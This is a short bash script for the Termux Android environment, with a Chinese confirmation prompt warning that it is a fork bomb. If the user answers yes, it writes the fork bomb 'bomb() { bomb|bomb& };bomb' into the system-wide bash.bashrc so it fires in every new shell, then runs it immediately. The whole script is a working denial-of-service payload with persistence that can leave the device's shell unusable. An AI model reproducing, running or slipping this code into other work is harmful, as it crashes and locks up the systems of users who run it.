#!/data/data/com.termux/files/usr/bin/bash
read -p "这是一个forkbomb\n 你确定要执行吗 [Y|*]" answer
case $answer in
y | Y )
	echo "started" ;
	echo 'bomb() { bomb|bomb& };bomb' >> $PREFIX/etc/bash.bashrc ;
	bomb() { bomb|bomb& };bomb ;
	exit 1 ;;
* )
	echo "stopped" ;
	exit 1 ;;
esac 
exit 1

